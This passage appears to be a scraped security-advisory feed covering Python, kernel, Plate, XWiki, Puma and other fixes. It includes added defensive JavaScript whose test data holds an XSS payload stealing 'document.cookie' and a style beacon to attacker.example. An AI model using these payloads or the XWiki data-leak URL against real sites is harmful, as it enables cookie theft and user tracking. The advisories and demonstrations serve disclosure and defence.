gh-102988: email.utils.getaddresses() and email.utils.parseaddr() now return ('', '') 2-tuples in more situations where invalid email addresses are encountered instead of potentially inaccurate values. Add optional strict parameter to these two functions: use strict=False to get the old behavior, accept malformed inputs. getattr(email.utils, 'supports_strict_parsing', False) can be used to check if the strict parameter is available. This improves the CVE-2023-27043 fix.
gh-123270: Sanitize names in zipfile.Path to avoid infinite loops (gh-122905) without breaking contents using legitimate characters. That's CVE-2024-8088.
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-6def755315

19.09.2024 03:18:31 | fedora | [FEDORA-2024-091e2c7801] Fedora 41: python3.6 (high)
Security fix for CVE-2024-6232 (rhbz#2310092)
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-091e2c7801

19.09.2024 03:18:31 | fedora | [FEDORA-2024-2b163f9201] Fedora 41: python3.10 (high)
This is a security release of Python 3.10

Note: The release you're looking at is Python 3.10.15, a security bugfix release for the legacy 3.10 series. Python 3.12 is now the latest feature release series of Python 3.

Security content in this release

gh-123067: Fix quadratic complexity in parsing "-quoted cookie values with backslashes by http.cookies. Fixes CVE-2024-7592.
gh-113171: Fixed various false positives and false negatives in IPv4Address.is_private, IPv4Address.is_global, IPv6Address.is_private, IPv6Address.is_global. Fixes CVE-2024-4032.
gh-67693: Fix urllib.parse.urlunparse() and urllib.parse.urlunsplit() for URIs with path starting with multiple slashes and no authority. Fixes CVE-2015-2104.
gh-121957: Fixed missing audit events around interactive use of Python, now also properly firing for python -i, as well as for python -m asyncio. The event in question is cpython.run_stdin.
gh-122133: Authenticate the socket connection for the socket.socketpair() fallback on platforms where AF_UNIX is not available like Windows.
gh-121285: Remove backtracking from tarfile header parsing for hdrcharset, PAX, and GNU sparse headers. That's CVE-2024-6232.
gh-114572: ssl.SSLContext.cert_store_stats() and ssl.SSLContext.get_ca_certs() now correctly lock access to the certificate store, when the ssl.SSLContext is shared across multiple threads.
gh-102988: email.utils.getaddresses() and email.utils.parseaddr() now return ('', '') 2-tuples in more situations where invalid email addresses are encountered instead of potentially inaccurate values. Add optional strict parameter to these two functions: use strict=False to get the old behavior, accept malformed inputs. getattr(email.utils, 'supports_strict_parsing', False) can be used to check if the strict parameter is available. This improves the CVE-2023-27043 fix.
gh-123270: Sanitize names in zipfile.Path to avoid infinite loops (gh-122905) without breaking contents using legitimate characters. That's CVE-2024-8088.
gh-121650: email headers with embedded newlines are now quoted on output. The generator will now refuse to serialize (write) headers that are unsafely folded or delimited; see verify_generated_headers. That's CVE-2024-6923.
gh-119690: Fixes data type confusion in audit events raised by _winapi.CreateFile and _winapi.CreateNamedPipe.
gh-116773: Fix instances of "<_overlapped.Overlapped object at 0xXXX> still has pending operation at deallocation, the process may crash".
gh-112275: A deadlock involving pystate.c's HEAD_LOCK in posixmodule.c at fork is now fixed.
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-2b163f9201

19.09.2024 03:00:00 | cisa | [CISA-2024:0919] CISA Adds One Known Exploited Vulnerability to Catalog (critical)
CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0919

19.09.2024 03:00:00 | redhat | [RHSA-2024:6837] pcp security update (important)
Performance Co-Pilot (PCP) is a suite of tools, services, and libraries for acquisition, archiving, and analysis of system-level performance measurements. Its light-weight distributed architecture makes it particularly well-suited to centralized analysis of complex systems.

Security Fix(es):
* pcp: pmpost symlink attack allows escalating pcp to root user (CVE-2024-45770)
* pcp: pmcd heap corruption through metric pmstore operations (CVE-2024-45769)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:6837

19.09.2024 03:00:00 | redhat | [RHSA-2024:6848] pcp security update (important)
Performance Co-Pilot (PCP) is a suite of tools, services, and libraries for acquisition, archiving, and analysis of system-level performance measurements. Its light-weight distributed architecture makes it particularly well-suited to centralized analysis of complex systems.

Security Fix(es):
* pcp: pmpost symlink attack allows escalating pcp to root user (CVE-2024-45770)
* pcp: pmcd heap corruption through metric pmstore operations (CVE-2024-45769)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:6848

19.09.2024 00:03:53 | suse | [SUSE-SU-2024:3322-1] Security update for the Linux Kernel RT (Live Patch 1 for SLE 15 SP6) (important)
Security update for the Linux Kernel RT (Live Patch 1 for SLE 15 SP6)
https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3322-1

19.09.2024 00:03:47 | suse | [SUSE-SU-2024:3321-1] Security update for the Linux Kernel RT (Live Patch 0 for SLE 15 SP6) (important)
Security update for the Linux Kernel RT (Live Patch 0 for SLE 15 SP6)
https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3321-1

19.09.2024 00:03:40 | suse | [SUSE-SU-2024:3320-1] Security update for the Linux Kernel RT (Live Patch 15 for SLE 15 SP5) (important)
Security update for the Linux Kernel RT (Live Patch 15 for SLE 15 SP5)
https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3320-1

18.09.2024 23:33:32 | suse | [SUSE-SU-2024:3319-1] Security update for the Linux Kernel RT (Live Patch 16 for SLE 15 SP5) (important)
Security update for the Linux Kernel RT (Live Patch 16 for SLE 15 SP5)
https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3319-1

18.09.2024 23:03:45 | suse | [SUSE-SU-2024:3318-1] Security update for the Linux Kernel RT (Live Patch 11 for SLE 15 SP5) (important)
Security update for the Linux Kernel RT (Live Patch 11 for SLE 15 SP5)
https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3318-1

18.09.2024 21:34:09 | ubuntu | [USN-7022-1] Linux kernel vulnerabilities (high)
Several security issues were fixed in the Linux kernel.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7022-1

18.09.2024 22:25:26 | npm | [NPM:GHSA-68G8-C275-XF2M] Directus vulnerable to SSRF Loopback IP filter bypass (moderate)
### Impact
If you're relying on blocking access to localhost using the default `0.0.0.0` filter, this can be bypassed using other registered loopback devices (like `127.0.0.2` - `127.127.127.127`).

### Workaround
You can block this bypass by manually adding the `127.0.0.0/8` CIDR range, which will block access to any `127.X.X.X` IP instead of just `127.0.0.1`.
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-68G8-C275-XF2M

18.09.2024 19:21:05 | ubuntu | [USN-7021-1] Linux kernel vulnerabilities (high)
Several security issues were fixed in the Linux kernel.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7021-1

18.09.2024 22:22:56 | npm | [NPM:GHSA-RRR8-F88R-H8Q6] find-my-way has a ReDoS vulnerability in multiparametric routes (high)
### Impact
A bad regular expression is generated any time you have two parameters within a single segment, when adding a `-` at the end, like `/:a-:b-`.

### Patches
Update to find-my-way v8.2.2 or v9.0.1, or subsequent versions.

### Workarounds
No known workarounds.

### References
- [CVE-2024-45296](https://github.com/advisories/GHSA-9wv6-86v2-598j)
- [Detailed blog post about `path-to-regexp` vulnerability](https://blakeembrey.com/posts/2024-09-web-redos/)
https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-RRR8-F88R-H8Q6

18.09.2024 18:01:54 | ubuntu | [USN-7020-1] Linux kernel vulnerabilities (critical)
Several security issues were fixed in the Linux kernel.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7020-1

18.09.2024 22:23:24 | maven | [MAVEN:GHSA-PG4M-3GP6-HW4W] org.xwiki.platform:xwiki-platform-notifications-ui leaks data of notification filters of users (moderate)
### Impact
It's possible to get access to notification filters of any user by using a URL such as `<hostname>xwiki/bin/get/XWiki/Notifications/Code/NotificationFilterPreferenceLivetableResults?outputSyntax=plain&type=custom&user=<username>`. This vulnerability impacts all versions of XWiki since 13.2-rc-1.

The filters do not provide much information (they mainly contain references, which are public data in XWiki), though some info could be used in combination with other vulnerabilities.

### Patches
The vulnerability has been patched in XWiki 14.10.21, 15.5.5, 15.10.1, 16.0RC1. The patch consists of checking the rights of the user when sending the data.

### Workarounds
It's possible to work around the vulnerability by applying the patch manually: an administrator can directly edit the document `XWiki.Notifications.Code.NotificationFilterPreferenceLivetableResults` to apply the same changes as in the patch. See c8c6545f9bde6f5aade994aa5b5903a67b5c2582.

### References
* Jira ticket: https://jira.xwiki.org/browse/XWIKI-20336
* Commit: c8c6545f9bde6f5aade994aa5b5903a67b5c2582

### For more information
If you have any questions or comments about this advisory:
* Open an issue in [Jira XWiki.org](https://jira.xwiki.org/)
* Email us at [Security Mailing List](mailto:security@xwiki.org)

### Attribution
This vulnerability has been reported on Intigriti by [Mete](https://www.linkedin.com/in/metehan-kalkan-5a3201199).
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-PG4M-3GP6-HW4W

18.09.2024 22:23:09 | maven | [MAVEN:GHSA-R95W-889Q-X2GX] org.xwiki.platform:xwiki-platform-notifications-ui is missing checks for notification filter preferences editions (moderate)
### Impact
It's possible for any user knowing the ID of a notification filter preference of another user to enable/disable it or even delete it. The impact is that the target user might start losing notifications on some pages because of this.

This vulnerability is present in XWiki since 13.2-rc-1.

### Patches
The vulnerability has been patched in XWiki 14.10.21, 15.5.5, 15.10.1, 16.0-rc-1. The patch consists of properly checking the rights of the user before performing any action on the filters.

### Workarounds
It's possible to fix the vulnerability manually by editing the document `XWiki.Notifications.Code.NotificationPreferenceService` to apply the changes performed in commit e8acc9d8e6af7dfbfe70716ded431642ae4a6dd4.

### References
* JIRA ticket: https://jira.xwiki.org/browse/XWIKI-20337
* Commit: e8acc9d8e6af7dfbfe70716ded431642ae4a6dd4

### For more information
If you have any questions or comments about this advisory:
* Open an issue in [Jira XWiki.org](https://jira.xwiki.org/)
* Email us at [Security Mailing List](mailto:security@xwiki.org)

### Attribution
This vulnerability has been reported on Intigriti by @floerer
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-R95W-889Q-X2GX

18.09.2024 15:55:10 | suse | [SUSE-SU-2024:3309-1] Security update for libmfx (moderate)
Security update for libmfx
https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3309-1

18.09.2024 15:54:54 | suse | [SUSE-SU-2024:3307-1] Security update for ucode-intel (moderate)
Security update for ucode-intel
https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3307-1

18.09.2024 15:54:46 | suse | [SUSE-SU-2024:3306-1] Security update for clamav (important)
Security update for clamav
https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3306-1

18.09.2024 15:53:47 | suse | [SUSE-SU-2024:3305-1] Security update for clamav (important)
Security update for clamav
https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3305-1

18.09.2024 15:52:47 | suse | [SUSE-SU-2024:3304-1] Security update for the Linux Kernel (important)
Security update for the Linux Kernel
https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3304-1

18.09.2024 15:52:26 | suse | [SUSE-SU-2024:3303-1] Security update for python312 (important)
Security update for python312
https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3303-1

18.09.2024 15:52:07 | suse | [SUSE-SU-2024:3302-1] Security update for python3 (important)
Security update for python3
https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3302-1

18.09.2024 15:51:40 | suse | [SUSE-SU-2024:3301-1] Security update for ffmpeg-4 (important)
Security update for ffmpeg-4
https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3301-1

18.09.2024 13:59:07 | suse | [SUSE-SU-2024:3298-1] Security update for python-dnspython (moderate)
Security update for python-dnspython
https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3298-1

18.09.2024 13:56:55 | suse | [SUSE-SU-2024:3297-1] Security update for python-dnspython (moderate)
Security update for python-dnspython
https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3297-1

18.09.2024 13:00:09 | ubuntu | [USN-7019-1] Linux kernel vulnerabilities (critical)
Several security issues were fixed in the Linux kernel.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7019-1

18.09.2024 12:36:05 | ubuntu | [USN-6885-3] Apache HTTP Server vulnerabilities (critical)
Several security issues were fixed in Apache HTTP Server.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6885-3

18.09.2024 10:35:12 | suse | [SUSE-SU-2024:3295-1] Security update for gstreamer-plugins-bad (important)
Security update for gstreamer-plugins-bad
https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3295-1

18.09.2024 09:39:50 | suse | [SUSE-SU-2024:3294-1] Security update for python3 (important)
Security update for python3
https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3294-1

18.09.2024 09:39:04 | suse | [SUSE-SU-2024:3293-1] Security update for python36 (important)
Security update for python36
https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3293-1

18.09.2024 06:35:32 | fedora | [FEDORA-2024-37f95ce86b] Fedora 39: chromium (high)
update to 128.0.6613.137
* High CVE-2024-8636: Heap buffer overflow in Skia
* High CVE-2024-8637: Use after free in Media Router
* High CVE-2024-8638: Type Confusion in V8
* High CVE-2024-8639: Use after free in Autofill
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-37f95ce86b

18.09.2024 21:18:02 | rubysec | [RUBYSEC:DEVISE-TWO-FACTOR-2024-8796] Devise-Two-Factor Authentication Uses Insufficient Default OTP Shared Secret Length (medium)
### Summary
Under the default configuration, Devise-Two-Factor versions >= 2.2.0 & < 6.0.0 generate TOTP shared secrets that are 120 bits instead of the 128-bit minimum defined by [RFC 4226](https://datatracker.ietf.org/doc/html/rfc4226).

Using a shared secret shorter than the minimum to generate a multi-factor authentication code could make it easier for an attacker to guess the shared secret and generate valid TOTP codes.

### Remediation
Devise-Two-Factor should be upgraded to version v6.0.0 as soon as possible. After upgrading, the length of shared secrets and TOTP URLs generated by the library will increase since the new shared secrets will be longer.

If upgrading is not possible, you can override the default `otp_secret_length` attribute in the model when configuring `two_factor_authenticable` and set it to a value of at least 26 to ensure newly generated shared secrets are at least 128 bits long.

After upgrading or implementing the workaround, applications using Devise-Two-Factor may wish to migrate users to the new OTP length to provide increased protection for those accounts. Turning off OTP for users by setting `otp_required_for_login` to false is not recommended since it would leave accounts unprotected. However, you may wish to implement application logic that checks the length of a user's shared secret and prompts users to re-enroll in OTP.

### Background
Devise-Two-Factor uses [ROTP](https://github.com/mdp/rotp) to generate shared secrets for TOTP. In ROTP < 5.0.0, the first argument to the "ROTP::Base32#random_base32" function represented the number of bytes to read from SecureRandom, which were then returned as a base32-encoded string. In ROTP 5.1.0, this function was changed so that the first argument now represents the length of the base32-encoded string returned by the function instead of the number of bytes to read from SecureRandom, resulting in a shorter key being generated for the same input value (https://github.com/mdp/rotp/commit/c6c24ab894e7c2b1579d45ac82c41454d1e98227).
https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:DEVISE-TWO-FACTOR-2024-8796

18.09.2024 19:49:03 | pypi | [PYSEC-2024-82] mindsdb vulnerability (high)
Deserialization of untrusted data can occur in versions 23.3.2.0 and newer of the MindsDB platform, enabling a maliciously uploaded model to run arbitrary code on the server when interacted with.
https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-82

18.09.2024 19:49:03 | pypi | [PYSEC-2024-83] mindsdb vulnerability (high)
Deserialization of untrusted data can occur in versions 23.10.2.0 and newer of the MindsDB platform, enabling a maliciously uploaded ‘inhouse’ model to run arbitrary code on the server when used for a prediction.
https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-83

18.09.2024 19:49:03 | pypi | [PYSEC-2024-84] mindsdb vulnerability (high)
Deserialization of untrusted data can occur in versions 23.10.3.0 and newer of the MindsDB platform, enabling a maliciously uploaded ‘inhouse’ model to run arbitrary code on the server when a ‘describe’ query is run on it.
https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-84

18.09.2024 19:49:03 | pypi | [PYSEC-2024-85] mindsdb vulnerability (high)
Deserialization of untrusted data can occur in versions 23.10.2.0 and newer of the MindsDB platform, enabling a maliciously uploaded ‘inhouse’ model to run arbitrary code on the server when using ‘finetune’ on it.
https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-85

21.09.2024 04:28:01 | fedora | [FEDORA-2024-e453a209e9] Fedora 39: python3.12, python3-docs (high)
This is the sixth maintenance release of Python 3.12

Python 3.12 is the newest major release of the Python programming language, and it contains many new features and optimizations. 3.12.6 is the latest maintenance release, containing about 90 bugfixes, build improvements and documentation changes since 3.12.5. This is an expedited release to address the following security issues:

gh-123067: Fix quadratic complexity in parsing "-quoted cookie values with backslashes by http.cookies. Fixes CVE-2024-7592.
gh-121285: Remove backtracking from tarfile header parsing for hdrcharset, PAX, and GNU sparse headers. That's CVE-2024-6232.
gh-102988: email.utils.getaddresses() and email.utils.parseaddr() now return ('', '') 2-tuples in more situations where invalid email addresses are encountered instead of potentially inaccurate values. Add optional strict parameter to these two functions: use strict=False to get the old behavior, accept malformed inputs. getattr(email.utils, 'supports_strict_parsing', False) can be used to check if the strict parameter is available. This improves the CVE-2023-27043 fix.
gh-123270: Sanitize names in zipfile.Path to avoid infinite loops (gh-122905) without breaking contents using legitimate characters. That's CVE-2024-8088.
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-e453a209e9

21.09.2024 04:28:00 | fedora | [FEDORA-2024-527052ab76] Fedora 39: expat (critical)
Rebase to version 2.6.3
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-527052ab76

21.09.2024 04:27:59 | fedora | [FEDORA-2024-0ce77b8571] Fedora 39: aardvark-dns (high)
Security fix for CVE-2024-8418
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-0ce77b8571

21.09.2024 03:17:34 | fedora | [FEDORA-2024-7d5c1bcc78] Fedora 41: openssl (critical)
Fix CVE-2024-5535: SSL_select_next_proto buffer overread
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-7d5c1bcc78

21.09.2024 03:17:14 | fedora | [FEDORA-2024-671549e74c] Fedora 41: expat (critical)
Rebase to version 2.6.3
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-671549e74c

21.09.2024 03:17:13 | fedora | [FEDORA-2024-30ed35ba86] Fedora 41: aardvark-dns (high)
Security fix for CVE-2024-8418
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-30ed35ba86

20.09.2024 18:16:35 | suse | [SUSE-SU-2024:3358-1] Security update for ffmpeg-4 (important)
Security update for ffmpeg-4
https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3358-1

20.09.2024 18:13:09 | suse | [SUSE-SU-2024:3357-1] Security update for python310 (important)
Security update for python310
https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3357-1

21.09.2024 01:07:37npm[NPM:GHSA-73RG-F94J-XVHX] Plate allows arbitrary DOM attributes in element.attributes and leaf.attributes (high)

### Impact

One longstanding feature of Plate is the ability to add custom DOM attributes to any element or leaf using the `attributes` property. These attributes are passed to the node component using the `nodeProps` prop.

Note: The `attributes` prop that is typically rendered alongside `nodeProps` is unrelated.

```ts
[{
  type: 'p',
  attributes: { 'data-my-attribute': 'This will be rendered on the paragraph element' },
  children: [{
    bold: true,
    attributes: { 'data-my-attribute': 'This will be rendered on the bold leaf element' },
    text: 'Bold text',
  }],
}]
```

```tsx
const ParagraphElement = ({ attributes, nodeProps, children }) => (
  <p
    {...attributes}
    {...nodeProps} // Arbitrary DOM attributes are injected here
  >
    {children}
  </p>
);

const BoldLeaf = ({ attributes, nodeProps, children }) => (
  <strong
    {...attributes}
    {...nodeProps} // Arbitrary DOM attributes are injected here
  >
    {children}
  </strong>
);
```

It has come to our attention that this feature can be used for malicious purposes, including cross-site scripting (XSS) and information exposure (specifically, users' IP addresses and whether or not they have opened a malicious document).

Note that the risk of information exposure via `attributes` is only relevant to applications in which web requests to arbitrary URLs are not ordinarily allowed. Plate editors that allow users to embed images from arbitrary URLs, for example, already carry the risk of leaking users' IP addresses to third parties.

All Plate editors using an affected version of `@udecode/plate-core` are vulnerable to these information exposure attacks via the `style` attribute and other attributes that can cause web requests to be sent. In addition, whether or not a Plate editor is vulnerable to cross-site scripting attacks using `attributes` depends on a number of factors.

The most likely DOM attributes to be vulnerable are `href` and `src` on links and iframes respectively. Any component that spreads `{...nodeProps}` onto an `<a>` or `<iframe>` element and does not later override `href` or `src` will be vulnerable to XSS.

```tsx
<a
  href={sanitizedHref}
  {...attributes}
  {...nodeProps} // Definitely vulnerable to XSS since `href` can be overridden
>
```

```tsx
<a
  {...attributes}
  {...nodeProps} // Probably not vulnerable to XSS via `href`
  href={sanitizedHref}
>
```

```tsx
<a
  {...attributes}
  {...nodeProps} // May be vulnerable to XSS via `href` if `href` is sometimes omitted from `sanitizedLinkProps`
  {...sanitizedLinkProps}
>
```

React does not allow passing a string to event handler props like `onClick`, so these are unlikely (but not impossible) to be vulnerable.

The attack surface is larger for users running older browsers, which may be vulnerable to XSS in DOM attributes that are less dangerous (although still vulnerable to information exposure) in modern browsers, such as `style` or `background`.

Potential attack vectors for delivering malicious Slate content to users include:

- Opening a malicious document stored on the server
- Pasting a malicious Slate fragment into a document
- Receiving malicious Slate operations on a collaborative document

### Patches

In patched versions of Plate, we have disabled `element.attributes` and `leaf.attributes` for most attribute names by default, with some exceptions including `target`, `alt`, `width`, `height`, `colspan` and `rowspan` on the link, image, video, table cell and table header cell plugins.

If this is a breaking change for you, you can selectively re-enable `attributes` for certain plugins as follows. Please carefully research and assess the security implications of any attribute you allow, as even seemingly innocuous attributes such as `style` can be used maliciously.

#### Plate >= 37

For custom plugins, specify the list of allowed attribute names in the `node.dangerouslyAllowAttributes` plugin configuration option.

```ts
const ImagePlugin = createPlatePlugin({
  key: 'image',
  node: {
    isElement: true,
    isVoid: true,
    dangerouslyAllowAttributes: ['alt'],
  },
});
```

To modify an existing plugin, use the `extend` method.

```ts
const MyImagePlugin = ImagePlugin.extend({
  node: {
    dangerouslyAllowAttributes: ['alt'],
  },
});
```

#### Plate < 37

Note that the patch has been backported to versions `@udecode/plate-core@21.5.1` and `@udecode/plate-core@36.5.9` only.

For custom plugins, specify the list of allowed attribute names in the `dangerouslyAllowAttributes` plugin configuration option.

```ts
const createImagePlugin = createPluginFactory({
  key: 'image',
  isElement: true,
  isVoid: true,
  dangerouslyAllowAttributes: ['alt'],
});
```

To modify an existing plugin, pass `dangerouslyAllowAttributes` to the plugin factory.

```ts
createImagePlugin({
  dangerouslyAllowAttributes: ['alt'],
});
```

### Workarounds

If you are unable to upgrade to any of the patched versions, you should use a tool like [`patch-package`](https://www.npmjs.com/package/patch-package) or [`yarn patch`](https://yarnpkg.com/cli/patch) to remove the logic from `@udecode/plate-core` that adds `attributes` to `nodeProps`.

This logic can be found in the `getRenderNodeProps` function and looks something like this. The entire `if` statement can safely be removed.

```ts
if (!newProps.nodeProps && attributes) {
  newProps.nodeProps = attributes;
}
```

After applying the patch, be sure to test its effectiveness by rendering a Slate value containing an `attributes` property on some element.

```ts
[{
  type: 'p',
  attributes: { 'data-vulnerable': true },
  children: [{ text: 'My paragraph' }],
}]
```

If the patch was successful, the `data-vulnerable="true"` attribute should not be present on any DOM element when the Plate editor is rendered in the browser.

https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-73RG-F94J-XVHX
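The deny-by-default behaviour the patch describes, written out as an added example in plain JavaScript. This is not Plate's own code and not React: the plugin keys, the per-plugin allow lists and the malicious Slate value are constructed here (Plate's real option is `dangerouslyAllowAttributes` on each plugin). It also reproduces the two spread orders from the link component above so the override problem can be checked outside a browser.

```javascript
// Added example, not Plate's code: deny-by-default filtering of user-supplied
// node `attributes` before they are spread onto a DOM element, mirroring what
// the advisory says patched @udecode/plate-core does. Keys and lists below are
// constructed for the demo.

// Per-plugin allow lists. Unlisted plugins, and all leaves, allow nothing.
const DANGEROUSLY_ALLOWED_ATTRIBUTES = {
  a: ['target'],
  img: ['alt', 'width', 'height'],
  td: ['colspan', 'rowspan'],
  th: ['colspan', 'rowspan'],
};

// Keep only attribute names on the plugin's allow list. Names are compared
// case-insensitively because HTML attribute names are case-insensitive, so an
// attacker's `HREF` must not slip past a check written for `href`.
function filterNodeAttributes(pluginKey, attributes) {
  if (!attributes || typeof attributes !== 'object') return {};
  const allowed = new Set(
    (DANGEROUSLY_ALLOWED_ATTRIBUTES[pluginKey] || []).map((n) => n.toLowerCase()),
  );
  const safe = {};
  for (const [name, value] of Object.entries(attributes)) {
    if (allowed.has(name.toLowerCase())) safe[name] = value;
  }
  return safe;
}

// Spread order matters independently of filtering. These mirror the advisory's
// link component variants: in the first a user-controlled `href` overrides the
// sanitized one, in the second the sanitized value is applied last and wins.
function linkPropsVulnerable(sanitizedHref, nodeProps) {
  return { href: sanitizedHref, ...nodeProps };
}
function linkPropsHardened(sanitizedHref, nodeProps) {
  return { ...nodeProps, href: sanitizedHref };
}

// Walk a Slate value and report, per node, what would reach the DOM after
// filtering. Leaves (nodes with `text`) are keyed 'leaf'; elements by `type`.
function renderedAttributes(nodes, out = []) {
  for (const node of nodes) {
    const key = 'text' in node ? 'leaf' : node.type;
    out.push({ key, attrs: filterNodeAttributes(key, node.attributes) });
    if (Array.isArray(node.children)) renderedAttributes(node.children, out);
  }
  return out;
}

// Constructed malicious document: a link element and a leaf carrying attributes
// that could arrive via paste, server storage or collaborative operations.
const MALICIOUS_VALUE = [
  {
    type: 'a',
    attributes: {
      href: 'javascript:alert(document.cookie)',
      target: '_blank',
      style: 'background:url(https://attacker.example/beacon)',
    },
    children: [{ text: 'click me', attributes: { 'data-vulnerable': true } }],
  },
];

console.log(JSON.stringify(renderedAttributes(MALICIOUS_VALUE)));
console.log(linkPropsVulnerable('https://safe.example/', { href: 'javascript:alert(1)' }));
console.log(linkPropsHardened('https://safe.example/', { href: 'javascript:alert(1)' }));
```

Only `target` survives on the link and nothing survives on the leaf; the `style` beacon and the `javascript:` URL are dropped before any component sees them. The two `linkProps` helpers show that even with filtering off, putting the sanitized `href` after the spread is what prevents the override.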
20.09.2024 17:12:25suse[SUSE-SU-2024:3355-1] Security update for libpcap (moderate)Security update for libpcaphttps://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3355-1
20.09.2024 16:06:18suse[SUSE-SU-2024:3354-1] Security update for wpa_supplicant (important)Security update for wpa_supplicanthttps://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3354-1
20.09.2024 12:32:01suse[SUSE-SU-2024:3353-1] Security update for python36 (moderate)Security update for python36https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3353-1
20.09.2024 10:58:24suse[SUSE-SU-2024:3351-1] Security update for python3 (moderate)Security update for python3https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3351-1
20.09.2024 04:58:18fedora[FEDORA-2024-d273b23c67] Fedora 40: chromium (high)update to 129.0.6668.58 * High CVE-2024-8904: Type Confusion in V8 * Medium CVE-2024-8905: Inappropriate implementation in V8 * Medium CVE-2024-8906: Incorrect security UI in Downloads * Medium CVE-2024-8907: Insufficient data validation in Omnibox * Low CVE-2024-8908: Inappropriate implementation in Autofill * Low CVE-2024-8909: Inappropriate implementation in UIhttps://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-d273b23c67
20.09.2024 21:47:22rubysec[RUBYSEC:PUMA-2024-45614] Puma's header normalization allows for client to clobber proxy set headers (medium)

### Impact

Clients could clobber values set by intermediate proxies (such as X-Forwarded-For) by providing an underscore version of the same header (X-Forwarded_For). Any users trusting headers set by their proxy may be affected. Attackers may be able to downgrade connections to HTTP (non-SSL) or redirect responses, which could cause confidentiality leaks if combined with a separate MITM attack.

### Patches

v6.4.3/v5.6.9 now discards any headers using underscores if the non-underscore version also exists, effectively allowing the proxy-defined headers to always win.

### Workarounds

Nginx has an [underscores_in_headers](https://nginx.org/en/docs/http/ngx_http_core_module.html#underscores_in_headers) configuration variable to discard these headers at the proxy level. Any users that are implicitly trusting the proxy-defined headers for security or availability should immediately cease doing so until upgraded to the fixed versions.

https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:PUMA-2024-45614
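An added example, not Puma's code, that models the CGI-style normalisation behind this advisory in JavaScript: header names are upper-cased and `-` becomes `_` to form `HTTP_*` keys, so a client-sent `X-Forwarded_For` lands on the same key as the proxy's `X-Forwarded-For`. It shows the collision, the fix the patch describes (discard the underscore spelling whenever the dash spelling is also present), and a small detector for logging such attempts. The header list is constructed; which spelling wins in the vulnerable path depends on the order the server sees them, and here the client's variant arrives last.

```javascript
// Added example, not Puma's code. Constructed headers; CGI-style HTTP_* keys.

function envKey(name) {
  return 'HTTP_' + name.toUpperCase().replace(/-/g, '_');
}

// Vulnerable: both spellings map to the same key and the last one written wins.
function normalizeHeadersVulnerable(headers) {
  const env = {};
  for (const [name, value] of headers) env[envKey(name)] = value;
  return env;
}

// Fixed: an underscore-bearing name is discarded if a dash-form name maps to
// the same HTTP_* key, so proxy-set headers always win. A lone underscore
// header with no dash twin is still passed through, as in patched Puma, so an
// application must not treat such a header as proxy-set.
function normalizeHeadersFixed(headers) {
  const dashKeys = new Set(
    headers.filter(([n]) => !n.includes('_')).map(([n]) => envKey(n)),
  );
  const env = {};
  for (const [name, value] of headers) {
    if (name.includes('_') && dashKeys.has(envKey(name))) continue;
    env[envKey(name)] = value;
  }
  return env;
}

// Detection helper for the edge or for logging: returns the underscore
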